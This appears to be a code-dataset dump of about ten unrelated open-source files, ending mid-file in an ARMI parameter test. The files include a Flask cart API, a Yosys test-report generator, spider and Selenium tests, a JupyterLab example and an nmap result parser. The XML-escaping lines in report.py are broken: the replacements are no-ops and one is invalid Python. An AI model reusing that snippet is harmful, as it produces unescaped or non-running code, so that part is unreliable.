max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
flaskshop/api/checkout.py | maquinuz/flask-shop | 141 | 12738766 | from flask_restplus import Namespace, Resource, fields
from flask_login import current_user
api = Namespace("checkout", description="Checkout related operations")
cart = api.model(
"CartLine",
{
"id": fields.Integer(required=True, description="The checkout cartline id"),
"quantity": fields.Integer(required=True, description="The cart item num"),
"title": fields.String(
description="The cart item title", attribute="variant.product.title"
),
"variant": fields.String(
description="The cart item variant", attribute="variant.title"
),
"product_id": fields.Integer(
description="The cart item product", attribute="variant.product.id"
),
"price": fields.Float(
description="The cart item price", attribute="variant.price"
),
"first_img": fields.String(
description="The cart item image", attribute="variant.product.first_img"
),
},
)
@api.route("/cart")
class CartIndex(Resource):
@api.doc("list_products")
@api.marshal_list_with(cart)
def get(self):
"""List current user cart items"""
cartitems = current_user.cart.lines
return cartitems
|
third_party/tests/YosysTests/report.py | parzival3/Surelog | 156 | 12738767 | <reponame>parzival3/Surelog<filename>third_party/tests/YosysTests/report.py
#!/usr/bin/env python3
import os, time
from pathlib import Path
def getListOfFiles(dirName):
listOfFile = os.listdir(dirName)
allFiles = list()
for entry in listOfFile:
fullPath = os.path.join(dirName, entry)
if os.path.isdir(fullPath):
allFiles = allFiles + getListOfFiles(fullPath)
else:
if Path(fullPath).suffix==".status":
allFiles.append(fullPath)
return allFiles
def main():
listOfFiles = getListOfFiles('.')
listOfFiles.sort()
testsuits = list()
casenumber = dict()
errors = dict()
failures = dict()
total_errors = 0
total_failures = 0
min_start_time = time.time()
max_end_time = 0
for elem in listOfFiles :
st = elem.split('/')
testsuit = st[1]
testcase = st[-1].replace('.status','')
if (testsuit not in testsuits):
testsuits.append(testsuit)
casenumber[testsuit] = 0
errors[testsuit] = 0
failures[testsuit] = 0
casenumber[testsuit] += 1
status = open(elem, 'r').read().strip()
min_start_time = min(min_start_time, os.path.getmtime(os.path.join(os.path.dirname(elem),'.start')))
max_end_time = max(max_end_time, os.path.getmtime(os.path.join(os.path.dirname(elem),'.stamp')))
if (status=='ERROR'):
errors[testsuit] += 1
total_errors += 1
if (status=='FAIL'):
failures[testsuit] += 1
total_failures += 1
# Creating report
with open("report.xml", "w") as f:
print('<?xml version="1.0" encoding="UTF-8"?>', file=f)
print('<testsuites disabled="0" errors="%d" failures="%d" tests="%d" time="%d">' % (total_errors, total_failures, len(listOfFiles), max_end_time - min_start_time), file=f)
for suite in testsuits:
print(' <testsuite disabled="0" errors="%d" failures="%d" name="%s" skipped="0" tests="%d" time="%d">' % (errors[suite], failures[suite], suite, casenumber[suite], 0), file=f)
for elem in listOfFiles :
st = elem.split('/')
testsuit = st[1]
if (testsuit != suite):
continue
testcase = st[-1].replace('.status','')
casenumber[testsuit] += 1
status = open(elem, 'r').read().strip()
print(' <testcase classname="%s.%s" name="%s" status="%s" time="%d">' % (testsuit, st[2].replace('.status',''), testcase, status,
os.path.getmtime(os.path.join(os.path.dirname(elem),'.stamp')) - os.path.getmtime(os.path.join(os.path.dirname(elem),'.start'))), file=f)
if (status=='ERROR'):
print(' <error message="%s" type="%s"/>' % (status, status), file=f)
if (status=='FAIL'):
print(' <failure message="%s" type="%s"/>' % (status, status), file=f)
file_tb = os.path.join(os.path.dirname(elem),'testbench.log')
file_re = os.path.join(os.path.dirname(elem),'result.log')
file_ys = os.path.join(os.path.dirname(elem),'yosys.log')
if (os.path.isfile(file_tb)):
print('<system-out>', end="", file=f)
with open(file_tb, "r") as logf:
for line in logf:
print(line.replace("&", "&").replace("<", "<").replace(">", ">").replace("\"", """), end="", file=f)
print('</system-out>', file=f)
elif (os.path.isfile(file_re)):
print('<system-out>', end="", file=f)
with open(file_re, "r") as logf:
for line in logf:
print(line.replace("&", "&").replace("<", "<").replace(">", ">").replace("\"", """), end="", file=f)
print('</system-out>', file=f)
elif (os.path.isfile(file_ys)):
print('<system-out>', end="", file=f)
with open(file_ys, "r") as logf:
for line in logf:
print(line.replace("&", "&").replace("<", "<").replace(">", ">").replace("\"", """), end="", file=f)
print('</system-out>', file=f)
print(' </testcase>', file=f)
print(' </testsuite>', file=f)
print('</testsuites>', file=f)
if __name__ == '__main__':
main()
|
bibliopixel/util/threads/sub.py | rec/leds | 253 | 12738791 | <filename>bibliopixel/util/threads/sub.py
"""
More or less uniformly run something as a new daemon thread or process.
"""
import multiprocessing, threading, queue
def _run_locally(input, output, function, args, **kwds):
function(input, output, *args, **kwds)
def run(function, *args, use_subprocess=False, daemon=True, **kwds):
"""
Create input, output queues, call `function` in a subprocess or a thread.
``function`` is called like this: ``function(input, output, *args, **kwds)``
:param use_subprocess: if true, create a new multiprocess;
if false, create a new thread
:param function: the function to call
:param daemon: is the thread or subprocess run as a daemon or not?
:param args: positional arguments to the function
:param kwds: keyword arguments to the function
:returns: a tuple with three elements: the subprocess or thread, an input
queue, and an output queue.
"""
if use_subprocess:
Creator, Queue = multiprocessing.Process, multiprocessing.Queue
else:
Creator, Queue = threading.Thread, queue.Queue
input, output = Queue(), Queue()
args = input, output, function, args
sub = Creator(target=_run_locally, args=args, kwargs=kwds, daemon=daemon)
sub.start()
return sub, input, output
|
qrcode.py | sulphatet/Python | 28,321 | 12738801 | <filename>qrcode.py<gh_stars>1000+
#importing Required Modules
import qrcode
#QR Code Generator
query = input("Enter Content: ") #Enter Content
code = qrcode.make(str(query)) #Making the QR code
code.save("qrcode.png") #Saving the QR code file |
libs/python/config/python.py | Manu343726/boost-cmake | 918 | 12738802 | <gh_stars>100-1000
#
# Copyright (c) 2016 <NAME>
# All rights reserved.
#
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
from . import ui
def add_options(vars):
ui.add_option('--python', help='the python executable')
def check(context):
python_source_file = r"""
// If defined, enforces linking againg PythonXXd.lib, which
// is usually not included in Python environments.
#undef _DEBUG
#include "Python.h"
int main()
{
Py_Initialize();
Py_Finalize();
return 0;
}
"""
import platform
import subprocess
import re, os
def check_python(cmd):
return subprocess.check_output([python, '-c', cmd]).strip()
def check_sysconfig(cmd):
r = check_python('import distutils.sysconfig as c; print(c.%s)'%cmd)
return r if r != 'None' else ''
context.Message('Checking for Python...')
python = context.env.GetOption('python') or 'python'
context.env['PYTHON'] = python
incpath = check_sysconfig('get_python_inc()')
context.env.AppendUnique(CPPPATH=[incpath])
if platform.system() == 'Windows':
version = check_python('import sys; print("%d%d"%sys.version_info[0:2])')
prefix = check_python('import sys; print(sys.prefix)')
libfile = os.path.join(prefix, 'libs', 'python%s.lib'%version)
libpath = os.path.join(prefix, 'libs')
lib = 'python%s'%version
context.env.AppendUnique(LIBS=[lib])
else:
libpath = check_sysconfig('get_config_var("LIBDIR")')
libfile = check_sysconfig('get_config_var("LIBRARY")')
match = re.search('(python.*)\.(a|so|dylib)', libfile)
lib = None
if match:
lib = match.group(1)
context.env.AppendUnique(PYTHONLIBS=[lib])
if match.group(2) == 'a':
flags = check_sysconfig('get_config_var("LINKFORSHARED")')
if flags is not None:
context.env.AppendUnique(LINKFLAGS=flags.split())
context.env.AppendUnique(LIBPATH=[libpath])
oldlibs = context.AppendLIBS([lib])
flags = check_sysconfig('get_config_var("MODLIBS")')
flags += ' ' + check_sysconfig('get_config_var("SHLIBS")')
flags = [f[2:] for f in flags.strip().split() if f.startswith('-l')]
if flags:
context.AppendLIBS([flags])
result = context.TryLink(python_source_file,'.cpp')
if not result and context.env['PLATFORM'] == 'darwin':
# Sometimes we need some extra stuff on Mac OS
frameworkDir = libpath # search up the libDir tree for the proper home for frameworks
while frameworkDir and frameworkDir != "/":
frameworkDir, d2 = os.path.split(frameworkDir)
if d2 == "Python.framework":
if not "Python" in os.listdir(os.path.join(frameworkDir, d2)):
context.Result(0)
print((
"Expected to find Python in framework directory %s, but it isn't there"
% frameworkDir))
return False
break
context.env.AppendUnique(LINKFLAGS="-F%s" % frameworkDir)
result = context.TryLink(python_source_file,'.cpp')
if not result:
context.Result(0)
print("Cannot link program with Python.")
return False
if context.env['PLATFORM'] == 'darwin':
context.env['LDMODULESUFFIX'] = '.so'
context.Result(1)
context.SetLIBS(oldlibs)
context.env.AppendUnique(PYTHONLIBS=[lib] + flags)
return True
|
tests/test_spider.py | 123seven/ruia | 1,090 | 12738808 | <gh_stars>1000+
#!/usr/bin/env python
import asyncio
import os
from ruia import Item, Middleware, Request, Response, Spider, TextField
from ruia.exceptions import SpiderHookError
html_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "data", "for_spider_testing.html"
)
with open(html_path, mode="r", encoding="utf-8") as file:
HTML = file.read()
middleware = Middleware()
async def retry_func(request):
request.request_config["TIMEOUT"] = 10
@middleware.request
async def print_on_request(spider_ins, request):
request.headers = {"User-Agent": "ruia ua"}
@middleware.response
async def print_on_response(spider_ins, request, response):
assert isinstance(await response.text(), str)
assert request.headers == {"User-Agent": "ruia ua"}
class ItemDemo(Item):
title = TextField(xpath_select="/html/head/title")
class SpiderDemo(Spider):
start_urls = ["https://httpbin.org/get?p=0"]
request_config = {"RETRIES": 3, "DELAY": 0, "TIMEOUT": 20}
headers = {"User-Agent": "Ruia Spider"}
aiohttp_kwargs = {}
call_nums = 0
async def parse(self, response):
yield Request(
url=response.url,
callback=self.parse_item,
headers=self.headers,
request_config=self.request_config,
**self.aiohttp_kwargs,
)
async def parse_item(self, response):
pages = [f"https://httpbin.org/get?p={i}" for i in range(1, 2)]
async for resp in self.multiple_request(pages):
yield self.parse_next(response=resp, any_param="hello")
async def parse_next(self, response, any_param):
assert any_param == "hello"
yield self.request(
url="https://httpbin.org/get?p=2",
metadata={"any_param": any_param},
callback=self.parse_details,
)
async def parse_details(self, response):
item = await ItemDemo.get_item(html=HTML)
yield item
async def process_item(self, item: ItemDemo):
assert item.title == "for_spider_testing"
await self.count_nums()
async def count_nums(self):
SpiderDemo.call_nums += 1
def test_spider_with_middleware():
loop = asyncio.new_event_loop()
SpiderDemo.start(loop=loop, middleware=middleware)
assert SpiderDemo.call_nums == 1
def test_spider_with_error_middleware():
error_middleware = Middleware()
@error_middleware.request
def error_request(spider_ins, request, response):
pass
@error_middleware.response
async def error_response(spider_ins, request, response):
raise TypeError("error")
class SpiderDemo(Spider):
start_urls = ["https://httpbin.org/get?p=0"]
async def parse(self, response):
pass
SpiderDemo.start(middleware=error_middleware)
def test_spider_hook():
async def after_start_func(spider_ins):
print("after_start_func")
spider_ins.result["after_start"] = True
assert isinstance(spider_ins.result, dict)
async def before_stop_func(spider_ins):
print("before_stop_func")
spider_ins.result["before_stop"] = True
class SpiderHook(Spider):
start_urls = ["https://httpbin.org/get?p=0", "https://httpbin.org/404"]
request_config = {"RETRIES": 1, "DELAY": 0, "TIMEOUT": 10}
result = {
"after_start": False,
"before_stop": False,
"process_succeed_response": False,
"process_failed_response": False,
"process_item": False,
}
async def parse(self, response):
item = await ItemDemo.get_item(html=HTML)
yield item
async def process_item(self, item):
self.result["process_item"] = True
async def process_succeed_response(self, request, response):
# Hook for response
self.result["process_succeed_response"] = True
async def process_failed_response(self, request, response):
# Hook for response
self.result["process_failed_response"] = True
# Test middleware & hook
loop = asyncio.new_event_loop()
SpiderHook.start(
loop=loop, after_start=after_start_func, before_stop=before_stop_func
)
assert SpiderHook.result["after_start"] == True
assert SpiderHook.result["before_stop"] == True
assert SpiderHook.result["process_succeed_response"] == True
assert SpiderHook.result["process_failed_response"] == True
assert SpiderHook.result["process_item"] == True
def test_spider_hook_error():
class SpiderDemo(Spider):
start_urls = ["https://httpbin.org/get?p=0"]
async def parse(self, response):
pass
async def before_stop_func(spider_ins):
raise TypeError("error")
loop = asyncio.new_event_loop()
try:
SpiderDemo.start(loop=loop, before_stop=before_stop_func)
except Exception as e:
assert isinstance(e, SpiderHookError)
def test_invalid_callback_result():
class SpiderDemo(Spider):
start_urls = ["https://httpbin.org/get?p=0"]
result = {"process_callback_result": False}
async def parse(self, response):
yield {}
async def process_dict_callback_result(spider_ins, callback_result):
spider_ins.result["process_callback_result"] = True
class CustomCallbackResultType:
@classmethod
def init_spider(cls, spider):
spider.callback_result_map = spider.callback_result_map or {}
setattr(
spider, "process_dict_callback_result", process_dict_callback_result
)
spider.callback_result_map.update({"dict": "process_dict_callback_result"})
CustomCallbackResultType.init_spider(SpiderDemo)
loop = asyncio.new_event_loop()
SpiderDemo.start(loop=loop)
assert SpiderDemo.result["process_callback_result"] == True
def test_spider_multiple_request_sync():
result = list()
class MultipleRequestSpider(Spider):
start_urls = ["https://httpbin.org"]
concurrency = 3
async def parse(self, response: Response):
urls = [f"https://httpbin.org/get?p={page}" for page in range(1, 2)]
async for response in self.multiple_request(urls, is_gather=True):
yield self.parse_next(response=response)
async def parse_next(self, response):
json_result = await response.json()
page = json_result["args"]["p"]
result.append(int(page))
MultipleRequestSpider.start()
assert result == [1]
def test_no_start_url_spider():
try:
class NoStartUrlSpider(Spider):
pass
NoStartUrlSpider.start()
except Exception as e:
assert isinstance(e, ValueError)
def test_callback_error():
class NoParseSpider(Spider):
start_urls = ["https://httpbin.org/get"]
NoParseSpider.start()
class CallbackError(Spider):
start_urls = ["https://httpbin.org/get"]
async def parse(self, response):
raise ValueError("error")
CallbackError.start()
def test_coroutine_callback_error():
class CoroutineItemErrorSpider(Spider):
start_urls = ["https://httpbin.org/get"]
async def parse(self, response):
pages = ["https://httpbin.org/get?p=1"]
async for resp in self.multiple_request(pages):
yield self.parse_item(response=resp)
async def parse_item(self, response):
await ItemDemo.get_item(html=await response.text())
CoroutineItemErrorSpider.start()
class CoroutineErrorSpider(Spider):
start_urls = ["https://httpbin.org/get"]
async def parse(self, response):
pages = ["https://httpbin.org/get?p=1"]
async for resp in self.multiple_request(pages):
yield self.parse_item(response=resp)
async def parse_item(self, response):
raise ValueError("error")
CoroutineErrorSpider.start()
def test_nothing_matched_spider():
class NothingMatchedErrorSpider(Spider):
start_urls = ["https://httpbin.org/get"]
async def parse(self, response):
await ItemDemo.get_item(html=await response.text())
NothingMatchedErrorSpider.start()
def test_multiple_spider():
class MultipleSpider(Spider):
count = 0
start_urls = ["https://httpbin.org/get?p=0"]
async def parse(self, response):
MultipleSpider.count += 1
async def multiple_spider(loop):
await MultipleSpider.async_start(loop=loop, middleware=[middleware])
await MultipleSpider.async_start(loop=loop, middleware=middleware)
return MultipleSpider
loop = asyncio.new_event_loop()
spider_ins = loop.run_until_complete(multiple_spider(loop=loop))
assert spider_ins.count == 2
|
packages/services/examples/browser/main.py | DianeHu/jupyterlab | 11,496 | 12738816 | """
Copyright (c) Jupyter Development Team.
Distributed under the terms of the Modified BSD License.
"""
import os
import json
import os.path as osp
from jupyter_server.base.handlers import JupyterHandler, FileFindHandler
from jupyter_server.extension.handler import ExtensionHandlerMixin, ExtensionHandlerJinjaMixin
from jupyterlab_server import LabServerApp, LabConfig
from jupyter_server.utils import url_path_join as ujoin
from traitlets import Unicode
HERE = osp.dirname(__file__)
with open(os.path.join(HERE, 'package.json')) as fid:
version = json.load(fid)['version']
def _jupyter_server_extension_points():
return [
{
'module': __name__,
'app': ExampleApp
}
]
class ExampleHandler(
ExtensionHandlerJinjaMixin,
ExtensionHandlerMixin,
JupyterHandler
):
"""Handle requests between the main app page and notebook server."""
def get(self):
"""Get the main page for the application's interface."""
config_data = {
# Use camelCase here, since that's what the lab components expect
"appVersion": version,
'baseUrl': self.base_url,
'token': self.settings['token'],
'fullStaticUrl': ujoin(self.base_url, 'static', self.name),
'frontendUrl': ujoin(self.base_url, 'example/')
}
return self.write(
self.render_template(
'index.html',
static=self.static_url,
base_url=self.base_url,
token=self.settings['token'],
page_config=config_data
)
)
class ExampleApp(LabServerApp):
extension_url = '/example'
default_url = '/example'
app_url = "/example"
name = __name__
load_other_extensions = False
app_name = 'JupyterLab Example Service'
app_settings_dir = os.path.join(HERE, 'build', 'application_settings')
app_version = version
schemas_dir = os.path.join(HERE, 'build', 'schemas')
static_dir = os.path.join(HERE, 'build')
templates_dir = os.path.join(HERE, 'templates')
themes_dir = os.path.join(HERE, 'build', 'themes')
user_settings_dir = os.path.join(HERE, 'build', 'user_settings')
workspaces_dir = os.path.join(HERE, 'build', 'workspaces')
def initialize_handlers(self):
"""Add example handler to Lab Server's handler list.
"""
self.handlers.append(
('/example', ExampleHandler)
)
if __name__ == '__main__':
ExampleApp.launch_instance()
|
binding/web/tests/en-factory/selenium_test.py | Stonesjtu/porcupine | 1,034 | 12738822 | <filename>binding/web/tests/en-factory/selenium_test.py<gh_stars>1000+
#!/usr/bin/python3
import os
import sys
import threading
import time
from argparse import ArgumentParser
from http.server import HTTPServer, SimpleHTTPRequestHandler
from selenium import webdriver
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from webdriver_manager.chrome import ChromeDriverManager
class SimpleHttpServer(threading.Thread):
def __init__(self, host='localhost', port=4001, path='.'):
self._base_url = f'http://{host}:{port}'
self._root_path = path
self._cwd = os.getcwd()
self._server = HTTPServer((host, port), SimpleHTTPRequestHandler)
super().__init__(daemon=True)
@property
def base_url(self):
return self._base_url
def run(self):
os.chdir(self._root_path)
print(f'starting server on port {self._server.server_port}')
self._server.serve_forever()
def stop(self):
os.chdir(self._cwd)
self._server.shutdown()
self._server.socket.close()
print(f'stopping server on port {self._server.server_port}')
def run_unit_test_selenium(url, access_key, absolute_audio_file):
desired_capabilities = DesiredCapabilities.CHROME
desired_capabilities['goog:loggingPrefs'] = {'browser': 'ALL'}
opts = Options()
opts.headless = True
driver = webdriver.Chrome(ChromeDriverManager().install(), desired_capabilities=desired_capabilities, options=opts)
driver.get(url)
assert "unit test" in driver.title
wait = WebDriverWait(driver, 10)
driver.find_element_by_id("audioFile").send_keys(absolute_audio_file)
wait.until(EC.visibility_of_element_located((By.ID, "audioLoaded")))
driver.find_element_by_id("accessKey").send_keys(access_key)
driver.find_element_by_id("sumbit").click()
wait.until(EC.visibility_of_element_located((By.ID, "testComplete")))
test_result = 1
test_message = "Tests failed"
for entry in driver.get_log('browser'):
print(entry['message'])
if 'Test passed!' in entry['message']:
test_message = "Tests passed"
test_result = 0
driver.close()
print(test_message)
return test_result
def main():
parser = ArgumentParser()
parser.add_argument(
'--access_key',
required=True)
parser.add_argument(
'--audio_file',
required=True)
args = parser.parse_args()
absolute_audio_file = os.path.abspath(args.audio_file)
simple_server = SimpleHttpServer(port=4005, path=os.path.join(os.path.dirname(__file__), '..', '..'))
test_url = f'{simple_server.base_url}/porcupine-web-en-factory/test/index.html'
simple_server.start()
time.sleep(4)
result = 0
try:
result = run_unit_test_selenium(test_url, args.access_key, absolute_audio_file)
except Exception as e:
print(e)
result = 1
finally:
simple_server.stop()
sys.exit(result)
if __name__ == '__main__':
main()
|
examples/check_cpe.py | FreddieDev/python-libnmap | 414 | 12738829 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from libnmap.parser import NmapParser
rep = NmapParser.parse_fromfile("libnmap/test/files/full_sudo6.xml")
print(
"Nmap scan discovered {0}/{1} hosts up".format(
rep.hosts_up, rep.hosts_total
)
)
for _host in rep.hosts:
if _host.is_up():
print(
"+ Host: {0} {1}".format(_host.address, " ".join(_host.hostnames))
)
# get CPE from service if available
for s in _host.services:
print(
" Service: {0}/{1} ({2})".format(
s.port, s.protocol, s.state
)
)
# NmapService.cpelist returns an array of CPE objects
for _serv_cpe in s.cpelist:
print(" CPE: {0}".format(_serv_cpe.cpestring))
if _host.os_fingerprinted:
print(" OS Fingerprints")
for osm in _host.os.osmatches:
print(
" Found Match:{0} ({1}%)".format(osm.name, osm.accuracy)
)
# NmapOSMatch.get_cpe() method return an array of string
# unlike NmapOSClass.cpelist which returns an array of CPE obj
for cpe in osm.get_cpe():
print("\t CPE: {0}".format(cpe))
|
armi/reactor/tests/test_parameters.py | keckler/armi | 162 | 12738832 | # Copyright 2019 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" tests of the Parameters class """
# pylint: disable=missing-function-docstring,missing-class-docstring,abstract-method,protected-access
import unittest
import traceback
import armi
from armi.reactor import parameters
from armi.reactor import composites
class MockComposite:
def __init__(self, name):
self.name = name
self.p = {}
class MockCompositeGrandParent(MockComposite):
pass
class MockCompositeParent(MockCompositeGrandParent):
pass
class MockCompositeChild(MockCompositeParent):
pass
class ParameterTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.defs = parameters.ALL_DEFINITIONS._paramDefs
@classmethod
def tearDownClass(cls):
parameters.ALL_DEFINITIONS._paramDefs = cls.defs
def setUp(self):
parameters.ALL_DEFINITIONS._paramDefs = []
def test_mutableDefaultsNotSupported(self):
class Mock(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
with self.assertRaises(AssertionError):
pb.defParam("units", "description", "location", default=[])
with self.assertRaises(AssertionError):
pb.defParam("units", "description", "location", default={})
with self.assertRaises(AssertionError):
fail = pDefs.createBuilder(default=[])
with self.assertRaises(AssertionError):
fail = pDefs.createBuilder(default={})
def test_paramPropertyDoesNotConflict(self):
class Mock(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("doodle", "units", "description", "location", default=42)
with pDefs.createBuilder(MockComposite, default=0.0) as pb:
pb.defParam("cheese", "kg", "pressed curds of milk", "avg")
pb.defParam("fudge", "kg", "saturated chocolate", "avg", default=19)
pb.defParam(
"noodles",
"kg",
"strip, ring, or tube of pasta",
"avg",
default=None,
)
mock1 = Mock()
mock2 = Mock()
self.assertEqual(42, mock1.doodle)
self.assertEqual(42, mock2.doodle)
self.assertEqual(0.0, mock1.cheese) # make sure factory default is applied
self.assertEqual(
19, mock2.fudge
) # make sure we can override the factory default
self.assertEqual(
None, mock2.noodles
) # make sure we can override the factory default
mock1.doodle = 17
self.assertEqual(17, mock1.doodle)
self.assertEqual(42, mock2.doodle)
def test_paramPropertyDoesNotConflictWithNoneDefault(self):
class Mock(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam(
"noneDefault", "units", "description", "location", default=None
)
mock1 = Mock()
mock2 = Mock()
self.assertIsNone(mock1.noneDefault)
self.assertIsNone(mock2.noneDefault)
mock1.noneDefault = 1.234
self.assertEqual(1.234, mock1.noneDefault)
self.assertEqual(None, mock2.noneDefault)
def test_getWithoutDefaultRaisesParameterError(self):
class Mock(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("noDefault", "units", "description", "location")
mock = Mock()
with self.assertRaises(parameters.ParameterError):
print(mock.noDefault)
def test_attemptingToSetParamWithoutSetterFails(self):
class Mock(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam(
"noSetter",
"noSetter",
"units",
"description",
"location",
default="encapsulated",
setter=None,
)
mock = Mock()
self.assertEqual("encapsulated", mock.noSetter)
with self.assertRaises(parameters.ParameterError):
mock.noSetter = False
self.assertEqual("encapsulated", mock.noSetter)
def test_setter(self):
class Mock(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
def n(self, value):
self._p_n = value
self._p_nPlus1 = value + 1
pb.defParam("n", "units", "description", "location", setter=n)
def nPlus1(self, value):
self._p_nPlus1 = value
self._p_n = value - 1
pb.defParam("nPlus1", "units", "description", "location", setter=nPlus1)
mock = Mock()
self.assertTrue(
all(
pd.assigned == parameters.NEVER
for pd in mock.paramDefs
if pd.name != "serialNum"
)
)
with self.assertRaises(parameters.ParameterError):
print(mock.n)
with self.assertRaises(parameters.ParameterError):
print(mock.nPlus1)
mock.n = 15
self.assertEqual(15, mock.n)
self.assertEqual(16, mock.nPlus1)
mock.nPlus1 = 22
self.assertEqual(21, mock.n)
self.assertEqual(22, mock.nPlus1)
self.assertTrue(all(pd.assigned for pd in mock.paramDefs))
def test_cannotDefineParameterWithSameName(self):
with self.assertRaises(parameters.ParameterDefinitionError):
class MockParamCollection(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("sameName", "units", "description 1", "location")
pb.defParam("sameName", "units", "description 2", "location")
_ = MockParamCollection()
def test_paramDefinitionsCompose(self):
class MockBaseParamCollection(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("base1", "units", "a param on the base collection", "avg")
pb.defParam(
"base2", "units", "another param on the base collection", "avg"
)
class MockDerivedACollection(MockBaseParamCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("derAp1", "units", "derived a p 1", "centroid")
pb.defParam("derAp2", "units", "derived a p 2", "centroid")
class MockDerivedBCollection(MockDerivedACollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("derBp", "units", "derived b param", "centroid")
base = MockBaseParamCollection()
derA = MockDerivedACollection()
derB = MockDerivedBCollection()
self.assertTrue(
set(base.paramDefs._paramDefs).issubset(set(derA.paramDefs._paramDefs))
)
self.assertTrue(
set(base.paramDefs._paramDefs).issubset(set(derB.paramDefs._paramDefs))
)
self.assertTrue(
set(derA.paramDefs._paramDefs).issubset(set(derB.paramDefs._paramDefs))
)
def test_cannotDefineParameterWithSameNameForCollectionSubclass(self):
class MockPCParent(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("sameName", "units", "description 3", "location")
with self.assertRaises(parameters.ParameterDefinitionError):
class MockPCChild(MockPCParent):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("sameName", "units", "description 4", "location")
_ = MockPCChild()
# same name along a different branch from the base ParameterCollection should be fine
class MockPCUncle(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("sameName", "units", "description 5", "location")
def test_cannotCreateAttrbuteOnParameterCollectionSubclass(self):
class MockPC(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("someParam", "units", "description", "location")
_ = MockPC()
def test_cannotCreateInstanceOf_NoDefault(self):
with self.assertRaises(NotImplementedError):
_ = parameters.NoDefault()
def test_cannotCreateInstanceOf_Undefined(self):
with self.assertRaises(NotImplementedError):
_ = parameters.parameterDefinitions._Undefined()
def test_defaultLocation(self):
class MockPC(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder(location=parameters.ParamLocation.AVERAGE) as pb:
pb.defParam("p1", "units", "p1 description")
pb.defParam(
"p2", "units", "p2 description", parameters.ParamLocation.TOP
)
pc = MockPC()
self.assertEqual(pc.paramDefs["p1"].location, parameters.ParamLocation.AVERAGE)
self.assertEqual(pc.paramDefs["p2"].location, parameters.ParamLocation.TOP)
def test_categories(self):
class MockPC0(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("p0", "units", "p0 description", "location")
pc = MockPC0()
self.assertEqual(pc.paramDefs.categories, set())
class MockPC(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder(categories=["awesome", "stuff"]) as pb:
pb.defParam("p1", "units", "p1 description", "location")
pb.defParam(
"p2", "units", "p2 description", "location", categories=["bacon"]
)
with pDefs.createBuilder() as pb:
pb.defParam(
"p3", "units", "p3 description", "location", categories=["bacon"]
)
pc = MockPC()
self.assertEqual(pc.paramDefs.categories, set(["awesome", "stuff", "bacon"]))
p1 = pc.paramDefs["p1"]
p2 = pc.paramDefs["p2"]
p3 = pc.paramDefs["p3"]
self.assertEqual(p1.categories, set(["awesome", "stuff"]))
self.assertEqual(p2.categories, set(["awesome", "stuff", "bacon"]))
self.assertEqual(p3.categories, set(["bacon"]))
self.assertEqual(set(pc.paramDefs.inCategory("awesome")), set([p1, p2]))
self.assertEqual(set(pc.paramDefs.inCategory("stuff")), set([p1, p2]))
self.assertEqual(set(pc.paramDefs.inCategory("bacon")), set([p2, p3]))
def test_parameterCollectionsHave__slots__(self):
"""Make sure something is implemented to prevent accidental creation of attributes"""
self.assertEqual(
set(["_hist", "_backup", "assigned", "_p_serialNum", "serialNum"]),
set(parameters.ParameterCollection._slots),
)
class MockPC(parameters.ParameterCollection):
pass
pc = MockPC()
# No longer protecting against __dict__ access. If someone REALLY wants to
# staple something to a parameter collection with no guarantees of anything,
# that's on them
# with self.assertRaises(AttributeError):
# pc.__dict__["foo"] = 5
with self.assertRaises(AssertionError):
pc.whatever = 22
# try again after using a ParameterBuilder
class MockPC(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
# use of the ParameterBuilder creates an empty __slots__
with pDefs.createBuilder() as pb:
pb.defParam("p0", "units", "p0 description", "location")
pc = MockPC()
self.assertTrue("_p_p0" in MockPC._slots)
# Make sure we aren't making any weird copies of anything
self.assertTrue(pc._slots is MockPC._slots)
with self.assertRaises(AssertionError):
